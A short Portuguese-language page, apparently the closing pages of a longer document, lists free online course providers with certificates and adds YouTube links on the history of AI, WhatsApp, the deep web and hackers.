Os melhores sites e apps para fazer cursos gratuitos com certificado:


1. Fundação Bradesco
2. Senai
3. Iped
4. Sebrae
5. Tim
6. Microsoft
7. App cursos de graça
Conteúdos extras:
A historia da inteligencia artificial: https://youtu.be/Lhu8bdmkMCM
A historia do Whatsapp: https://youtu.be/znE50MkOkT0
A história da deepweb: https://youtu.be/axtOWNg_dkY
Hackers de verdade: https://youtu.be/xEZYlCKEfFk

Página 57 de 58
Página 58 de 58

Você também pode gostar